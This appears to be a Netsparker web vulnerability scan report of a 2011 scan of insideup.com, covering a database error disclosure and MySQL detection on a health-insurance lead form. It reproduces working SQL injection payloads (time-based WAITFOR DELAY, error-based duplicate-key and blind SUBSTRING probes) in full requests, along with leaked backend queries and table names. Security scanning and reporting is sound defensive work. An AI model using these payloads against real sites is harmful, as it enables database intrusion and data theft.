count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
Database Error Message

Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&i..

Parameters

Parameter Type Value
catId GET ';WAITFOR DELAY '0:0:25'--
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Request

GET /ppc/leadflow/hins00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=npihp24902e7n3sk535t1v0c13
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 14:34:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4254
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc='+(select 1 and row(1,1)>(select count(*),concat' at line 5
MySQL Database Identified

MySQL Database Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.

Impact

This issue is reported as additional information only, there is no direct impact arising from this issue.
- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=-%2527%252B(select%2b1%2ba..

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=-%2527%252B(select%2b1%2band%2brow(1%252c1)%253E(select%2bcount(*)%252cconcat(CONCAT(CHAR(95)%252CCHAR(33)%252CCHAR(64)%252CCHAR(52)%252CCHAR(100)%252CCHAR(105)%252CCHAR(108)%252CCHAR(101)%252CCHAR(109)%252CCHAR(109)%252CCHAR(97))%252c0x3a%252cfloor(rand()*2))x%2bfrom%2b(select%2b1%2bunion%2bselect%2b2)a%2bgroup%2bby%2bx%2blimit%2b1))%252B%2527%27OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--%20 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=npihp24902e7n3sk535t1v0c13
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 14:48:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<base href="http://www.insideup.com/ppc/leadflow/">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title> Health Insurance Services, Use InsideUp to Get Quotes and Compare Health Insurance Providers </title>
<meta name="description" content="Let health insurance companies compete for your health insurance needs. Compare local and national health insurance providers."/>
<meta name="keywords" content=" Health Insurance "/>
<link rel="stylesheet" href="css/newlanding_style.css" />
<link rel="stylesheet" href="style/dhtmlwindow.css" />
<link rel="stylesheet" href="css/ui.core.css" />
<link rel="stylesheet" href="css/Dyn_form_style.css" />
<script type="text/javascript" src='js/jquery.js'></script>
<script type="text/javascript" src="js/ui.core.js"></script>
<script type="text/javascript">
jQuery(document).ready(function() {
jQuery("form").attr("autocomplete", "off");
});
var global_form_attribute = 16 </script>

<script language="javascript" src="js/dhtmlwindow.js"></script>
<script language="javascript" src="js/modal.js"></script>
<script type="text/javascript" src="js/application_js.js"></script>
<link href="css/styles.css" rel="stylesheet" type="text/css" />
<script>
function frmprompt(){
frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
}
function frmprompt02(){
frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
}
</script>
<style>
#step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11, #step_12, #step_13, #step_14, #step_15, #step_16, #step_17, {
font-size:12px;
width:100%;
}
.blackback {
background-color:#cccccc;
}
.whiteback {
background-color:#ffffff;
}
</style>
</head>
<body>
<div id="Main_div_wrap">
<div id="Main_Contant_Block">
<div id="lending_headern">
<table width="900" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="175" valign="middle">
<div style="padding-top: 13px; padding-bottom: 7px; padding-left: 13px;">
<a href="http://www.insideup.com/selectvendors.html" target="_blank"><img border="0" src="http://www.insideup.com/ppc/tools/images/newlanding_insideuplogo.jpg"/></a>
</div>
</td>

<td width="729">
<div class="Tx_S24 Tx_BlueL Tx_B" style="padding-top: 29px; padding-bottom: 10px; padding-left: 13px;"> Compare Health Insurance Providers<br />
<span class="Tx_S14 Tx_B Tx_black">Get Free Price Quotes from Pre-Screened, Top Health Insurance Companies</span>
</div>
</td>
</tr>
</table>
</div>

<div class="process_section">
<div class="left_ronud"></div>
<div class="mid_process">
<table width="100%" border="0" cellspacing="0" cellpadding="0" style="margin-top:10px;">
<tr>
<td width="4%"><img src="http://www.insideup.com/ppc/tools/images/50002/10072010014251_1.jpg" width="34" height="64" /></td>
<td width="23%" style="padding-left: 8px;"><span class="Green_Txt" style="display:block;">Describe Your Project </span> <span class="Light_blackText">Takes 2 Minutes</span></td>
<td width="7%" align="right" style="border-left:1px solid #c7c7c7;"><img src="http://www.insideup.com/ppc/tools/images/50002/10072010014251_2.jpg" width="38" height="64" /></td>
<td width="34%" style="padding-left:8px;"><span class="Green_Txt" style="display:block;">Get Matched with Top Vendors </span> <span class="Light_blackText">Based on Your Needs</span></td>
<td width="7%" align="right" style="border-left:1px solid #c7c7c7;"><img src="http://www.insideup.com/ppc/tools/images/50002/10072010014251_3.jpg" width="38" height="64" /></td>
<td width="25%" style="padding-left:8px;"><span class="Green_Txt" style="display:block;">Compare Quotes & Save </span> <span class="Light_blackText">No Obligation to Buy</span></td>
</tr>
</table>
</div>
<div class="right_ronud"></div>
</div>

<div class="form_area_section">
<div class="mid_form_left_section">
<form method="post" action="project_dynamic_page_updated.php?catId=50002&group=hins00&template=3" ID="insideupform" name="insideupform" onsubmit="return checkValues();">
<input type="hidden" name="subcategoryId" value="50002">
<input type="hidden" name="catId" value="50002">
<input type="hidden" name="iusrc" value="-%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27'OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))-- ">

<table width="550" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="535" align="right" class="Green_Txt1 Tx_S18 Tx_B">
<div id="modalalertdiv" style="display:none;">
<div class="myformpopbox">
<strong>What is InsideUp?</strong><br />
InsideUp is a unique and free online community where businesses such
as yours can connect with qualified vendors of business services who
compete for your business.<br />
<br />
<strong>How does it work?</strong><br />
You answer some questions about your business needs, and provide us
with your company and contact information, and we match you using our
superior matching technology with up to 5 reputable vendors, who will
respond within one business day either by phone or email.<br />
<br />
<strong>How do you protect my privacy?</strong><br />
InsideUp is an accredited business by the Better Business Bureau and
is secured by DigiCert. Your information is highly secure with us and
will only be given to up to 5 pre-screened, reputable vendors matched
to your specific needs.
</div>
</div>
</td>
</tr>

<tr>
<td height="30" valign="middle">
<div style="padding-left:1px;">
<span style="font-size: 12px;" class="Tx_S9">
Need to Talk to a Representative? <span style="color:#FF803E">Call (800) 417-9210</span> Anytime
</span>
</div>
</td>
</tr>

<tr>
<td>
<div style="float:left;">

<div id="Dyn_head" style="clear:left;float:left;">
<div class="Head_Txt" style="float:left;padding-left:8px;">Submit Your Health Insurance Needs</div>
<div style="float:right;padding-top:10px;padding-right:8px;"><span class="Tx_S9"><span class='Tx_S9'>Questions? </span><a href='#' onClick='frmprompt(); return false' class='bluetext Tx_S9'>Review FAQs</a></span></div>
</div>

<div id="Dyn_mid" style="clear:left;float:left;position:relative;">
<!-- -->

<div id="step_1" class="form-panel ">
<div class="mid_head_top_new">
<div class="Head_Txt_blue_new" style='margin-right:15px'>
In which states do you have employees residing? <span style="color:#000000;font-size:12px;">
</span>
</div>

</div>

<div style="float:left;width:215px;padding-left:8px;"><img src="images/Employ_girl.jpg" width="215" height="251" /></div>

<div style="height:230px;width:315px;overflow:auto;">
<p style="padding-top:10px;">
<div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input type="text" value="" id="radio_1" name="attributeId_556_t"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label></label></div></div> </p>
</div>
</div>
<div id="step_2" class="form-panel ui-helper-hidden">
<div class="mid_head_top_new">
<div class="Head_Txt_blue_new" style='margin-right:15px'>
How many years has your company been in business? <span style="color:#000000;font-size:12px;">
</span>
</div>

</div>

<div style="float:left;width:215px;padding-left:8px;"><img src="images/Employ_girl.jpg" width="215" height="251" /></div>

<div style="height:230px;width:315px;overflow:auto;">
<p style="padding-top:10px;">
<div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input type="text" value="" id="radio_2" name="attributeId_555_t"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label></label></div></div> </p>
</div>
</div>
<div id="step_3" class="form-panel ui-helper-hidden">
<div class="mid_head_top_new">
<div class="Head_Txt_blue_new" style='margin-right:15px'>
Please indicate the total number of employees, including yourself, who are eligible for this group health insurance plan <span style="color:#000000;font-size:12px;">
</span>
</div>

</div>

<div style="float:left;width:215px;padding-left:8px;"><img src="images/Employ_girl.jpg" width="215" height="251" /></div>

<div style="height:230px;width:315px;overflow:auto;">
<p style="padding-top:10px;">
<div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input type="text" value="" id="radio_3" name="attributeId_514_t"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label></label></div></div> </p>
</div>
</div>
<div id="step_4" class="form-panel ui-helper-hidden">
<div class="mid_head_top_new">
<div class="Head_Txt_blue_new" style='margin-right:15px'>
Do you currently offer group health insurance coverage? <span style="color:#000000;font-size:12px;">
(select one answer) </span>
</div>

</div>

<div style="float:left;width:215px;padding-left:8px;"><img src="images/Employ_girl.jpg" width="215" height="251" /></div>

<div style="height:230px;width:315px;overflow:auto;">
<p style="padding-top:10px;">
<div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" checked="checked" value="2739__No" id="radio_4" name="attributeId_421"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>No</label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="2740__Yes" id="radio_4" name="attributeId_421"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Yes</label></div></div> </p>
</div>
</div>
<div id="step_5" class="form-panel ui-helper-hidden">
<div class="mid_head_top_new">
<div class="Head_Txt_blue_new" style='margin-right:15px'>
Health plans with higher up-front, employee-paid, deductibles may also include lower premiums and greater flexibility. Do you have a preference for this type of plan? <span style="color:#000000;font-size:12px;">
(select one answer) </span>
</div>

</div>

<div style="float:left;width:215px;padding-left:8px;"><img src="images/Employ_girl.jpg" width="215" height="251" /></div>

<div style="height:230px;width:315px;overflow:auto;">
<p style="padding-top:10px;">
<div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" checked="checked" value="3353__ Yes - higher deductibles " id="radio_5" name="attributeId_515"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label> Yes - higher deductibles </label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="3354__No - lower deductibles " id="radio_5" name="attributeId_515"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>No - lower deductibles </label></div></div><div style="width:auto;height:auto;"><div style="float:left;clear:left;"><input class="radio" type="radio" value="3355__Not sure" id="radio_5" name="attributeId_515"/> </div><div style="float: left; width: 207px;padding-top:3px;"><label>Not sure</label></div></div> </p>
</div>
</div>
<div id="step_6" class="form-panel ui-helper-hidden">
<div class="mid_head_top_new">
<div class="Head_Txt_blue_new" style='margin-right:15px'>
If you do currently offer a group health plan to your employees, what types of coverage are available? <span style="color:#000000;font-size:12px;">
(check all that apply) </span>
</div>

</div>

<div style="float:left;width:215px;padding-left:8px;"><img src="images/Employ_girl.jpg" width="215&qu..